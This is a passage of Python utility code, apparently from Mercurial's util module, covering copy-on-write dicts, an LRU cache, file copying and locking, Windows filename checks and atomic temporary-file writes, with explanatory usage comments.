            if isinstance(src, dict):
                src = src.iteritems()
            for k, v in src:
                self[k] = v

class cowdict(cow, dict):
    """copy-on-write dict

    Be sure to call d = d.preparewrite() before writing to d.

    >>> a = cowdict()
    >>> a is a.preparewrite()
    True
    >>> b = a.copy()
    >>> b is a
    True
    >>> c = b.copy()
    >>> c is a
    True
    >>> a = a.preparewrite()
    >>> b is a
    False
    >>> a is a.preparewrite()
    True
    >>> c = c.preparewrite()
    >>> b is c
    False
    >>> b is b.preparewrite()
    True
    """

class cowsortdict(cow, sortdict):
    """copy-on-write sortdict

    Be sure to call d = d.preparewrite() before writing to d.
    """

class transactional(object):
    """Base class for making a transactional type into a context manager."""
    __metaclass__ = abc.ABCMeta

    @abc.abstractmethod
    def close(self):
        """Successfully closes the transaction."""

    @abc.abstractmethod
    def release(self):
        """Marks the end of the transaction.

        If the transaction has not been closed, it will be aborted.
        """

    def __enter__(self):
        return self

    def __exit__(self, exc_type, exc_val, exc_tb):
        try:
            if exc_type is None:
                self.close()
        finally:
            self.release()

@contextlib.contextmanager
def acceptintervention(tr=None):
    """A context manager that closes the transaction on InterventionRequired.

    If no transaction was provided, this simply runs the body and returns.
    """
    if not tr:
        yield
        return
    try:
        yield
        tr.close()
    except error.InterventionRequired:
        tr.close()
        raise
    finally:
        tr.release()

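# Illustrative sketch, not part of the original module: a transaction
# wrapped in acceptintervention() is committed rather than rolled back
# when the body raises InterventionRequired (e.g. to prompt the user).
# "tr" and "applychanges" are hypothetical names.
#
#   with acceptintervention(tr):
#       applychanges()  # InterventionRequired still closes tr first
#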
@contextlib.contextmanager
def nullcontextmanager():
    yield

class _lrucachenode(object):
    """A node in a doubly linked list.

    Holds a reference to nodes on either side as well as a key-value
    pair for the dictionary entry.
    """
    __slots__ = (u'next', u'prev', u'key', u'value', u'cost')

    def __init__(self):
        self.next = None
        self.prev = None

        self.key = _notset
        self.value = None
        self.cost = 0

    def markempty(self):
        """Mark the node as emptied."""
        self.key = _notset
        self.value = None
        self.cost = 0

class lrucachedict(object):
    """Dict that caches most recent accesses and sets.

    The dict consists of an actual backing dict - indexed by original
    key - and a doubly linked circular list defining the order of entries in
    the cache.

    The head node is the newest entry in the cache. If the cache is full,
    we recycle head.prev and make it the new head. Cache accesses result in
    the node being moved to before the existing head and being marked as the
    new head node.

    Items in the cache can be inserted with an optional "cost" value. This is
    simply an integer that is specified by the caller. The cache can be queried
    for the total cost of all items presently in the cache.

    The cache can also define a maximum cost. If a cache insertion would
    cause the total cost of the cache to go beyond the maximum cost limit,
    nodes will be evicted to make room for the new node. This can be used
    to e.g. set a max memory limit and associate an estimated bytes size
    cost to each item in the cache. By default, no maximum cost is enforced.
    """
    def __init__(self, max, maxcost=0):
        self._cache = {}

        self._head = head = _lrucachenode()
        head.prev = head
        head.next = head
        self._size = 1
        self.capacity = max
        self.totalcost = 0
        self.maxcost = maxcost

    def __len__(self):
        return len(self._cache)

    def __contains__(self, k):
        return k in self._cache

    def __iter__(self):
        # We don't have to iterate in cache order, but why not.
        n = self._head
        for i in range(len(self._cache)):
            yield n.key
            n = n.next

    def __getitem__(self, k):
        node = self._cache[k]
        self._movetohead(node)
        return node.value

    def insert(self, k, v, cost=0):
        """Insert a new item in the cache with optional cost value."""
        node = self._cache.get(k)
        # Replace existing value and mark as newest.
        if node is not None:
            self.totalcost -= node.cost
            node.value = v
            node.cost = cost
            self.totalcost += cost
            self._movetohead(node)

            if self.maxcost:
                self._enforcecostlimit()

            return

        if self._size < self.capacity:
            node = self._addcapacity()
        else:
            # Grab the last/oldest item.
            node = self._head.prev

        # At capacity. Kill the old entry.
        if node.key is not _notset:
            self.totalcost -= node.cost
            del self._cache[node.key]

        node.key = k
        node.value = v
        node.cost = cost
        self.totalcost += cost
        self._cache[k] = node
        # And mark it as newest entry. No need to adjust order since it
        # is already self._head.prev.
        self._head = node

        if self.maxcost:
            self._enforcecostlimit()

    def __setitem__(self, k, v):
        self.insert(k, v)

    def __delitem__(self, k):
        node = self._cache.pop(k)
        self.totalcost -= node.cost
        node.markempty()

        # Temporarily mark as newest item before re-adjusting head to make
        # this node the oldest item.
        self._movetohead(node)
        self._head = node.next

    # Additional dict methods.

    def get(self, k, default=None):
        try:
            return self._cache[k].value
        except KeyError:
            return default

    def clear(self):
        n = self._head
        while n.key is not _notset:
            self.totalcost -= n.cost
            n.markempty()
            n = n.next

        self._cache.clear()

    def copy(self, capacity=None, maxcost=0):
        """Create a new cache as a copy of the current one.

        By default, the new cache has the same capacity as the existing one.
        But, the cache capacity can be changed as part of performing the
        copy.

        Items in the copy have an insertion/access order matching this
        instance.
        """

        capacity = capacity or self.capacity
        maxcost = maxcost or self.maxcost
        result = lrucachedict(capacity, maxcost=maxcost)

        # We copy entries by iterating in oldest-to-newest order so the copy
        # has the correct ordering.

        # Find the first non-empty entry.
        n = self._head.prev
        while n.key is _notset and n is not self._head:
            n = n.prev

        # We could potentially skip the first N items when decreasing capacity.
        # But let's keep it simple unless it is a performance problem.
        for i in range(len(self._cache)):
            result.insert(n.key, n.value, cost=n.cost)
            n = n.prev

        return result

    def popoldest(self):
        """Remove the oldest item from the cache.

        Returns the (key, value) describing the removed cache entry.
        """
        if not self._cache:
            return

        # Walk the linked list backwards starting at tail node until we hit
        # a non-empty node.
        n = self._head.prev
        while n.key is _notset:
            n = n.prev

        key, value = n.key, n.value

        # And remove it from the cache and mark it as empty.
        del self._cache[n.key]
        self.totalcost -= n.cost
        n.markempty()

        return key, value

    def _movetohead(self, node):
        """Mark a node as the newest, making it the new head.

        When a node is accessed, it becomes the freshest entry in the LRU
        list, which is denoted by self._head.

        Visually, let's make ``N`` the new head node (* denotes head):

            previous/oldest <-> head <-> next/next newest

            ----<->--- A* ---<->-----
            |                       |
            E <-> D <-> N <-> C <-> B

        To:

            ----<->--- N* ---<->-----
            |                       |
            E <-> D <-> C <-> B <-> A

        This requires the following moves:

           C.next = D  (node.prev.next = node.next)
           D.prev = C  (node.next.prev = node.prev)
           E.next = N  (head.prev.next = node)
           N.prev = E  (node.prev = head.prev)
           N.next = A  (node.next = head)
           A.prev = N  (head.prev = node)
        """
        head = self._head
        # C.next = D
        node.prev.next = node.next
        # D.prev = C
        node.next.prev = node.prev
        # N.prev = E
        node.prev = head.prev
        # N.next = A
        # It is tempting to do just "head" here, however if node is
        # adjacent to head, this will do bad things.
        node.next = head.prev.next
        # E.next = N
        node.next.prev = node
        # A.prev = N
        node.prev.next = node

        self._head = node

    def _addcapacity(self):
        """Add a node to the circular linked list.

        The new node is inserted before the head node.
        """
        head = self._head
        node = _lrucachenode()
        head.prev.next = node
        node.prev = head.prev
        node.next = head
        head.prev = node
        self._size += 1
        return node

    def _enforcecostlimit(self):
        # This should run after an insertion. It should only be called if total
        # cost limits are being enforced.
        # The most recently inserted node is never evicted.
        if len(self) <= 1 or self.totalcost <= self.maxcost:
            return

        # This is logically equivalent to calling popoldest() until we
        # free up enough cost. We don't do that since popoldest() needs
        # to walk the linked list and doing this in a loop would be
        # quadratic. So we find the first non-empty node and then
        # walk nodes until we free up enough capacity.
        #
        # If we only removed the minimum number of nodes to free enough
        # cost at insert time, chances are high that the next insert would
        # also require pruning. This would effectively constitute quadratic
        # behavior for insert-heavy workloads. To mitigate this, we set a
        # target cost that is a percentage of the max cost. This will tend
        # to free more nodes when the high water mark is reached, which
        # lowers the chances of needing to prune on the subsequent insert.
        targetcost = int(self.maxcost * 0.75)

        n = self._head.prev
        while n.key is _notset:
            n = n.prev

        while len(self) > 1 and self.totalcost > targetcost:
            del self._cache[n.key]
            self.totalcost -= n.cost
            n.markempty()
            n = n.prev

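# Illustrative sketch, not part of the original module: with a max cost
# in effect, an insert that pushes totalcost past maxcost evicts oldest
# entries down past the 0.75 * maxcost water mark, not merely back under
# maxcost, so insert-heavy workloads don't have to prune on every call.
#
#   d = lrucachedict(4, maxcost=100)
#   d.insert(b'a', b'v0', cost=60)
#   d.insert(b'b', b'v1', cost=60)  # totalcost 120 > 100: b'a' evicted
#   d.totalcost                     # -> 60, back under the 75 target
#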
def lrucachefunc(func):
    '''cache most recent results of function calls'''
    cache = {}
    order = collections.deque()
    if func.__code__.co_argcount == 1:
        def f(arg):
            if arg not in cache:
                if len(cache) > 20:
                    del cache[order.popleft()]
                cache[arg] = func(arg)
            else:
                order.remove(arg)
            order.append(arg)
            return cache[arg]
    else:
        def f(*args):
            if args not in cache:
                if len(cache) > 20:
                    del cache[order.popleft()]
                cache[args] = func(*args)
            else:
                order.remove(args)
            order.append(args)
            return cache[args]

    return f

class propertycache(object):
    def __init__(self, func):
        self.func = func
        self.name = func.__name__
    def __get__(self, obj, type=None):
        result = self.func(obj)
        self.cachevalue(obj, result)
        return result

    def cachevalue(self, obj, value):
        # __dict__ assignment required to bypass __setattr__ (eg: repoview)
        obj.__dict__[self.name] = value

def clearcachedproperty(obj, prop):
    '''clear a cached property value, if one has been set'''
    if prop in obj.__dict__:
        del obj.__dict__[prop]

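# Illustrative sketch, not part of the original module: propertycache
# runs the function on first attribute access, then stores the result in
# the instance __dict__, which shadows the descriptor on later accesses.
# clearcachedproperty() forces recomputation. "expensivescan" is a
# hypothetical helper.
#
#   class thing(object):
#       @propertycache
#       def size(self):
#           return expensivescan()  # runs once per instance
#
#   t = thing()
#   t.size                          # computed and cached
#   clearcachedproperty(t, 'size')  # next access recomputes
#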
def increasingchunks(source, min=1024, max=65536):
    '''return no less than min bytes per chunk while data remains,
    doubling min after each chunk until it reaches max'''
    def log2(x):
        if not x:
            return 0
        i = 0
        while x:
            x >>= 1
            i += 1
        return i - 1

    buf = []
    blen = 0
    for chunk in source:
        buf.append(chunk)
        blen += len(chunk)
        if blen >= min:
            if min < max:
                min = min << 1
                nmin = 1 << log2(blen)
                if nmin > min:
                    min = nmin
                if min > max:
                    min = max
            yield ''.join(buf)
            blen = 0
            buf = []
    if buf:
        yield ''.join(buf)

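# Illustrative sketch, not part of the original module: small input
# chunks are coalesced into buffers that start at ``min`` bytes and
# roughly double per emitted chunk, capped at ``max``.
#
#   sizes = [len(c) for c in increasingchunks([b'x' * 100] * 200)]
#   # first chunk is >= 1024 bytes; later chunks grow toward 65536
#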
def always(fn):
    return True

def never(fn):
    return False

def nogc(func):
    """disable garbage collector

    Python's garbage collector triggers a GC each time a certain number of
    container objects (the number being defined by gc.get_threshold()) are
    allocated even when marked not to be tracked by the collector. Tracking has
    no effect on when GCs are triggered, only on what objects the GC looks
    into. As a workaround, disable GC while building complex (huge)
    containers.

    This garbage collector issue has been fixed in 2.7. But it still affects
    CPython's performance.
    """
    def wrapper(*args, **kwargs):
        gcenabled = gc.isenabled()
        gc.disable()
        try:
            return func(*args, **kwargs)
        finally:
            if gcenabled:
                gc.enable()
    return wrapper

if pycompat.ispypy:
    # PyPy runs slower with gc disabled
    nogc = lambda x: x

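# Illustrative sketch, not part of the original module: decorating a
# builder of large container objects with @nogc avoids GC passes
# triggered by the allocation count while the structure is built.
#
#   @nogc
#   def buildindex(entries):
#       return {e[0]: e for e in entries}  # GC re-enabled on return
#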
def pathto(root, n1, n2):
    '''return the relative path from one place to another.
    root should use os.sep to separate directories
    n1 should use os.sep to separate directories
    n2 should use "/" to separate directories
    returns an os.sep-separated path.

    If n1 is a relative path, it's assumed it's
    relative to root.
    n2 should always be relative to root.
    '''
    if not n1:
        return localpath(n2)
    if os.path.isabs(n1):
        if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
            return os.path.join(root, localpath(n2))
        n2 = '/'.join((pconvert(root), n2))
    a, b = splitpath(n1), n2.split('/')
    a.reverse()
    b.reverse()
    while a and b and a[-1] == b[-1]:
        a.pop()
        b.pop()
    b.reverse()
    return pycompat.ossep.join((['..'] * len(a)) + b) or '.'

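# Illustrative sketch, not part of the original module (POSIX paths
# assumed, so os.sep is '/'):
#
#   pathto(b'/repo', b'/repo/a/b', b'a/c/d')  # -> b'../c/d'
#   pathto(b'/repo', b'', b'a/c/d')           # -> b'a/c/d' (localpath)
#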
# the location of data files matching the source code
if procutil.mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
    # executable version (py2exe) doesn't support __file__
    datapath = os.path.dirname(pycompat.sysexecutable)
else:
    datapath = os.path.dirname(pycompat.fsencode(__file__))

i18n.setdatapath(datapath)

def checksignature(func):
    '''wrap a function with code to check for calling errors'''
    def check(*args, **kwargs):
        try:
            return func(*args, **kwargs)
        except TypeError:
            if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
                raise error.SignatureError
            raise

    return check

# a whitelist of known filesystems where hardlinks work reliably
_hardlinkfswhitelist = {
    'apfs',
    'btrfs',
    'ext2',
    'ext3',
    'ext4',
    'hfs',
    'jfs',
    'NTFS',
    'reiserfs',
    'tmpfs',
    'ufs',
    'xfs',
    'zfs',
}

def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
    '''copy a file, preserving mode and optionally other stat info like
    atime/mtime

    checkambig argument is used with filestat, and is useful only if
    destination file is guarded by any lock (e.g. repo.lock or
    repo.wlock).

    copystat and checkambig should be exclusive.
    '''
    assert not (copystat and checkambig)
    oldstat = None
    if os.path.lexists(dest):
        if checkambig:
            oldstat = checkambig and filestat.frompath(dest)
        unlink(dest)
    if hardlink:
        # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
        # unless we are confident that dest is on a whitelisted filesystem.
        try:
            fstype = getfstype(os.path.dirname(dest))
        except OSError:
            fstype = None
        if fstype not in _hardlinkfswhitelist:
            hardlink = False
    if hardlink:
        try:
            oslink(src, dest)
            return
        except (IOError, OSError):
            pass # fall back to normal copy
    if os.path.islink(src):
        os.symlink(os.readlink(src), dest)
        # copytime is ignored for symlinks, but in general copytime isn't
        # needed for them anyway
    else:
        try:
            shutil.copyfile(src, dest)
            if copystat:
                # copystat also copies mode
                shutil.copystat(src, dest)
            else:
                shutil.copymode(src, dest)
                if oldstat and oldstat.stat:
                    newstat = filestat.frompath(dest)
                    if newstat.isambig(oldstat):
                        # stat of copied file is ambiguous to original one
                        advanced = (
                            oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
                        os.utime(dest, (advanced, advanced))
        except shutil.Error as inst:
            raise error.Abort(str(inst))

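# Illustrative sketch, not part of the original module: hardlink=True is
# only honored when dest sits on a whitelisted filesystem; otherwise the
# call silently degrades to a real copy. The paths are hypothetical.
#
#   copyfile(b'store/data', b'backup/data', hardlink=True)
#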
def copyfiles(src, dst, hardlink=None, progress=None):
    """Copy a directory tree using hardlinks if possible."""
    num = 0

    def settopic():
        if progress:
            progress.topic = _('linking') if hardlink else _('copying')

    if os.path.isdir(src):
        if hardlink is None:
            hardlink = (os.stat(src).st_dev ==
                        os.stat(os.path.dirname(dst)).st_dev)
        settopic()
        os.mkdir(dst)
        for name, kind in listdir(src):
            srcname = os.path.join(src, name)
            dstname = os.path.join(dst, name)
            hardlink, n = copyfiles(srcname, dstname, hardlink, progress)
            num += n
    else:
        if hardlink is None:
            hardlink = (os.stat(os.path.dirname(src)).st_dev ==
                        os.stat(os.path.dirname(dst)).st_dev)
        settopic()

        if hardlink:
            try:
                oslink(src, dst)
            except (IOError, OSError):
                hardlink = False
                shutil.copy(src, dst)
        else:
            shutil.copy(src, dst)
        num += 1
        if progress:
            progress.increment()

    return hardlink, num

_winreservednames = {
    'con', 'prn', 'aux', 'nul',
    'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
    'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
}
_winreservedchars = ':*?"<>|'
def checkwinfilename(path):
    r'''Check that the base-relative path is a valid filename on Windows.
    Returns None if the path is ok, or a UI string describing the problem.

    >>> checkwinfilename(b"just/a/normal/path")
    >>> checkwinfilename(b"foo/bar/con.xml")
    "filename contains 'con', which is reserved on Windows"
    >>> checkwinfilename(b"foo/con.xml/bar")
    "filename contains 'con', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/xml.con")
    >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
    "filename contains 'AUX', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/bla:.txt")
    "filename contains ':', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/b\07la.txt")
    "filename contains '\\x07', which is invalid on Windows"
    >>> checkwinfilename(b"foo/bar/bla ")
    "filename ends with ' ', which is not allowed on Windows"
    >>> checkwinfilename(b"../bar")
    >>> checkwinfilename(b"foo\\")
    "filename ends with '\\', which is invalid on Windows"
    >>> checkwinfilename(b"foo\\/bar")
    "directory name ends with '\\', which is invalid on Windows"
    '''
    if path.endswith('\\'):
        return _("filename ends with '\\', which is invalid on Windows")
    if '\\/' in path:
        return _("directory name ends with '\\', which is invalid on Windows")
    for n in path.replace('\\', '/').split('/'):
        if not n:
            continue
        for c in _filenamebytestr(n):
            if c in _winreservedchars:
                return _("filename contains '%s', which is reserved "
                         "on Windows") % c
            if ord(c) <= 31:
                return _("filename contains '%s', which is invalid "
                         "on Windows") % stringutil.escapestr(c)
        base = n.split('.')[0]
        if base and base.lower() in _winreservednames:
            return _("filename contains '%s', which is reserved "
                     "on Windows") % base
        t = n[-1:]
        if t in '. ' and n not in '..':
            return _("filename ends with '%s', which is not allowed "
                     "on Windows") % t

if pycompat.iswindows:
    checkosfilename = checkwinfilename
    timer = time.clock
else:
    checkosfilename = platform.checkosfilename
    timer = time.time

if safehasattr(time, "perf_counter"):
    timer = time.perf_counter

def makelock(info, pathname):
    """Create a lock file atomically if possible

    This may leave a stale lock file if symlink isn't supported and signal
    interrupt is enabled.
    """
    try:
        return os.symlink(info, pathname)
    except OSError as why:
        if why.errno == errno.EEXIST:
            raise
    except AttributeError: # no symlink in os
        pass

    flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
    ld = os.open(pathname, flags)
    os.write(ld, info)
    os.close(ld)

def readlock(pathname):
    try:
        return os.readlink(pathname)
    except OSError as why:
        if why.errno not in (errno.EINVAL, errno.ENOSYS):
            raise
    except AttributeError: # no symlink in os
        pass
    fp = posixfile(pathname, 'rb')
    r = fp.read()
    fp.close()
    return r

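# Illustrative sketch, not part of the original module: the lock info is
# stored as a symlink target where symlinks exist, else as file content;
# readlock() transparently handles both representations. The lock path
# is hypothetical.
#
#   makelock(b'host.example.com:1234', b'.hg/wlock')
#   readlock(b'.hg/wlock')  # -> b'host.example.com:1234'
#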
def fstat(fp):
    '''stat file object that may not have fileno method.'''
    try:
        return os.fstat(fp.fileno())
    except AttributeError:
        return os.stat(fp.name)

# File system features

def fscasesensitive(path):
    """
    Return true if the given path is on a case-sensitive filesystem

    Requires a path (like /foo/.hg) ending with a foldable final
    directory component.
    """
    s1 = os.lstat(path)
    d, b = os.path.split(path)
    b2 = b.upper()
    if b == b2:
        b2 = b.lower()
        if b == b2:
            return True # no evidence against case sensitivity
    p2 = os.path.join(d, b2)
    try:
        s2 = os.lstat(p2)
        if s2 == s1:
            return False
        return True
    except OSError:
        return True

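# Illustrative sketch, not part of the original module: the check works
# by lstat'ing the path under a case-flipped final component and
# comparing the results; a case-folding filesystem reports the same file.
#
#   fscasesensitive(b'/path/to/repo/.hg')  # False on a case-folding fs
#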
try:
    import re2
    _re2 = None
except ImportError:
    _re2 = False

class _re(object):
    def _checkre2(self):
        global _re2
        try:
            # check if match works, see issue3964
            _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
        except ImportError:
            _re2 = False

    def compile(self, pat, flags=0):
        '''Compile a regular expression, using re2 if possible

        For best performance, use only re2-compatible regexp features. The
        only flags from the re module that are re2-compatible are
        IGNORECASE and MULTILINE.'''
        if _re2 is None:
            self._checkre2()
        if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
            if flags & remod.IGNORECASE:
                pat = '(?i)' + pat
            if flags & remod.MULTILINE:
                pat = '(?m)' + pat
            try:
                return re2.compile(pat)
            except re2.error:
                pass
        return remod.compile(pat, flags)

    @propertycache
    def escape(self):
        '''Return the version of escape corresponding to self.compile.

        This is imperfect because whether re2 or re is used for a particular
        function depends on the flags, etc, but it's the best we can do.
        '''
        global _re2
        if _re2 is None:
            self._checkre2()
        if _re2:
            return re2.escape
        else:
            return remod.escape

re = _re()

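# Illustrative sketch, not part of the original module: callers use the
# module-level ``re`` object like the stdlib module; re2 is only chosen
# when the pattern and flags are re2-compatible.
#
#   pat = re.compile(br'^[a-z]+$', remod.IGNORECASE)  # re2 if available
#   pat = re.compile(br'(?P<x>a)(?P=x)')  # backreference: falls back to re
#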
_fspathcache = {}
def fspath(name, root):
    '''Get name in the case stored in the filesystem

    The name should be relative to root, and be normcase-ed for efficiency.

    Note that this function is unnecessary, and should not be
    called, for case-sensitive filesystems (simply because it's expensive).

    The root should be normcase-ed, too.
    '''
    def _makefspathcacheentry(dir):
        return dict((normcase(n), n) for n in os.listdir(dir))

    seps = pycompat.ossep
    if pycompat.osaltsep:
        seps = seps + pycompat.osaltsep
    # Protect backslashes. This gets silly very quickly. (The original
    # statement discarded the result of replace(); assign it so the
    # separators are actually escaped inside the character classes.)
    seps = seps.replace('\\', '\\\\')
    pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
    dir = os.path.normpath(root)
    result = []
    for part, sep in pattern.findall(name):
        if sep:
            result.append(sep)
            continue

        if dir not in _fspathcache:
            _fspathcache[dir] = _makefspathcacheentry(dir)
        contents = _fspathcache[dir]

        found = contents.get(part)
        if not found:
            # retry "once per directory" per "dirstate.walk" which
            # may take place for each patch of "hg qpush", for example
            _fspathcache[dir] = contents = _makefspathcacheentry(dir)
            found = contents.get(part)

        result.append(found or part)
        dir = os.path.join(dir, part)

    return ''.join(result)

def checknlink(testfile):
    '''check whether hardlink count reporting works properly'''

    # testfile may be open, so we need a separate file for checking to
    # work around issue2543 (or testfile may get lost on Samba shares)
    f1, f2, fp = None, None, None
    try:
        fd, f1 = pycompat.mkstemp(prefix='.%s-' % os.path.basename(testfile),
                                  suffix='1~', dir=os.path.dirname(testfile))
        os.close(fd)
        f2 = '%s2~' % f1[:-2]

        oslink(f1, f2)
        # nlinks() may behave differently for files on Windows shares if
        # the file is open.
        fp = posixfile(f2)
        return nlinks(f2) > 1
    except OSError:
        return False
    finally:
        if fp is not None:
            fp.close()
        for f in (f1, f2):
            try:
                if f is not None:
                    os.unlink(f)
            except OSError:
                pass

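# Editor's note: illustrative sketch, not part of the original module. A
# caller would typically probe the target directory once and fall back to
# copying when hardlink counts are unreliable; '.hglinkprobe' is a
# hypothetical probe name (the probe file itself need not exist).
def _example_canusehardlinks(dirname):
    return checknlink(os.path.join(dirname, '.hglinkprobe'))
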
def endswithsep(path):
    '''Check path ends with os.sep or os.altsep.'''
    return (path.endswith(pycompat.ossep)
            or pycompat.osaltsep and path.endswith(pycompat.osaltsep))

def splitpath(path):
    '''Split path by os.sep.
    Note that this function does not use os.altsep because this is
    an alternative of simple "xxx.split(os.sep)".
    It is recommended to use os.path.normpath() before using this
    function if needed.'''
    return path.split(pycompat.ossep)

def mktempcopy(name, emptyok=False, createmode=None):
    """Create a temporary file with the same contents from name

    The permission bits are copied from the original file.

    If the temporary file is going to be truncated immediately, you
    can use emptyok=True as an optimization.

    Returns the name of the temporary file.
    """
    d, fn = os.path.split(name)
    fd, temp = pycompat.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
    os.close(fd)
    # Temporary files are created with mode 0600, which is usually not
    # what we want. If the original file already exists, just copy
    # its mode. Otherwise, manually obey umask.
    copymode(name, temp, createmode)
    if emptyok:
        return temp
    try:
        try:
            ifp = posixfile(name, "rb")
        except IOError as inst:
            if inst.errno == errno.ENOENT:
                return temp
            if not getattr(inst, 'filename', None):
                inst.filename = name
            raise
        ofp = posixfile(temp, "wb")
        for chunk in filechunkiter(ifp):
            ofp.write(chunk)
        ifp.close()
        ofp.close()
    except: # re-raises
        try:
            os.unlink(temp)
        except OSError:
            pass
        raise
    return temp

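# Editor's note: illustrative sketch, not part of the original module.
# mktempcopy() is the building block of atomictempfile below: the caller
# receives a same-mode temporary sibling of 'name' and is responsible for
# renaming it into place or unlinking it.
def _example_mktempcopy(name, data):
    temp = mktempcopy(name, emptyok=True)
    try:
        fp = posixfile(temp, 'wb')
        fp.write(data)
        fp.close()
        rename(temp, name)
    except Exception:
        tryunlink(temp)
        raise
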
class filestat(object):
    """helper to exactly detect change of a file

    'stat' attribute is the result of 'os.stat()' if the specified
    'path' exists. Otherwise, it is None. This avoids a preparatory
    'exists()' examination on the client side of this class.
    """
    def __init__(self, stat):
        self.stat = stat

    @classmethod
    def frompath(cls, path):
        try:
            stat = os.stat(path)
        except OSError as err:
            if err.errno != errno.ENOENT:
                raise
            stat = None
        return cls(stat)

    @classmethod
    def fromfp(cls, fp):
        stat = os.fstat(fp.fileno())
        return cls(stat)

    __hash__ = object.__hash__

    def __eq__(self, old):
        try:
            # if ambiguity between stat of new and old file is
            # avoided, comparison of size, ctime and mtime is enough
            # to exactly detect change of a file regardless of platform
            return (self.stat.st_size == old.stat.st_size and
                    self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
                    self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
        except AttributeError:
            pass
        try:
            return self.stat is None and old.stat is None
        except AttributeError:
            return False

    def isambig(self, old):
        """Examine whether new (= self) stat is ambiguous against old one

        "S[N]" below means stat of a file at N-th change:

        - S[n-1].ctime < S[n].ctime: can detect change of a file
        - S[n-1].ctime == S[n].ctime
          - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
          - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
          - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
        - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)

        Case (*2) above means that a file was changed twice or more at
        the same time in seconds (= S[n-1].ctime), and comparison of
        timestamps is ambiguous.

        The basic idea to avoid such ambiguity is "advance mtime 1 sec,
        if the timestamp is ambiguous".

        But advancing mtime only in case (*2) doesn't work as
        expected, because a naturally advanced S[n].mtime in case (*1)
        might be equal to a manually advanced S[n-1 or earlier].mtime.

        Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
        treated as ambiguous regardless of mtime, to avoid overlooking
        changes hidden by such colliding mtimes.

        Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
        S[n].mtime", even if the size of the file isn't changed.
        """
        try:
            return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
        except AttributeError:
            return False

    def avoidambig(self, path, old):
        """Change file stat of specified path to avoid ambiguity

        'old' should be the previous filestat of 'path'.

        This skips avoiding ambiguity if the process doesn't have
        appropriate privileges for 'path', and returns False in that
        case.

        Otherwise, this returns True, as "ambiguity is avoided".
        """
        advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
        try:
            os.utime(path, (advanced, advanced))
        except OSError as inst:
            if inst.errno == errno.EPERM:
                # utime() on a file created by another user causes EPERM,
                # if the process doesn't have appropriate privileges
                return False
            raise
        return True

    def __ne__(self, other):
        return not self == other

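# Editor's note: illustrative sketch, not part of the original module.
# It demonstrates the isambig()/avoidambig() protocol described above:
# after rewriting 'path', advance its mtime if the new stat is ambiguous
# with the old one. (writefile() is defined later in this module.)
def _example_writeavoidingambiguity(path, data):
    oldstat = filestat.frompath(path)
    writefile(path, data)
    if oldstat.stat:
        newstat = filestat.frompath(path)
        if newstat.isambig(oldstat):
            newstat.avoidambig(path, oldstat)
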
class atomictempfile(object):
    '''writable file object that atomically updates a file

    All writes will go to a temporary copy of the original file. Call
    close() when you are done writing, and atomictempfile will rename
    the temporary copy to the original name, making the changes
    visible. If the object is destroyed without being closed, all your
    writes are discarded.

    The checkambig argument of the constructor is used with filestat,
    and is only useful if the target file is guarded by any lock
    (e.g. repo.lock or repo.wlock).
    '''
    def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
        self.__name = name # permanent name
        self._tempname = mktempcopy(name, emptyok=('w' in mode),
                                    createmode=createmode)
        self._fp = posixfile(self._tempname, mode)
        self._checkambig = checkambig

        # delegated methods
        self.read = self._fp.read
        self.write = self._fp.write
        self.seek = self._fp.seek
        self.tell = self._fp.tell
        self.fileno = self._fp.fileno

    def close(self):
        if not self._fp.closed:
            self._fp.close()
            filename = localpath(self.__name)
            oldstat = self._checkambig and filestat.frompath(filename)
            if oldstat and oldstat.stat:
                rename(self._tempname, filename)
                newstat = filestat.frompath(filename)
                if newstat.isambig(oldstat):
                    # stat of changed file is ambiguous to original one
                    advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
                    os.utime(filename, (advanced, advanced))
            else:
                rename(self._tempname, filename)

    def discard(self):
        if not self._fp.closed:
            try:
                os.unlink(self._tempname)
            except OSError:
                pass
            self._fp.close()

    def __del__(self):
        if safehasattr(self, '_fp'): # constructor actually did something
            self.discard()

    def __enter__(self):
        return self

    def __exit__(self, exctype, excvalue, traceback):
        if exctype is not None:
            self.discard()
        else:
            self.close()

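# Editor's note: illustrative sketch, not part of the original module.
# atomictempfile is a context manager, so the common pattern is simply:
def _example_atomicwrite(path, data):
    with atomictempfile(path, 'wb') as fp:
        fp.write(data)
    # On normal exit the temporary file has replaced 'path'; if the body
    # raises, the temporary file is discarded and 'path' is untouched.
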
def unlinkpath(f, ignoremissing=False, rmdir=True):
    """unlink and remove the directory if it is empty"""
    if ignoremissing:
        tryunlink(f)
    else:
        unlink(f)
    if rmdir:
        # try removing directories that might now be empty
        try:
            removedirs(os.path.dirname(f))
        except OSError:
            pass

def tryunlink(f):
    """Attempt to remove a file, ignoring ENOENT errors."""
    try:
        unlink(f)
    except OSError as e:
        if e.errno != errno.ENOENT:
            raise

def makedirs(name, mode=None, notindexed=False):
    """recursive directory creation with parent mode inheritance

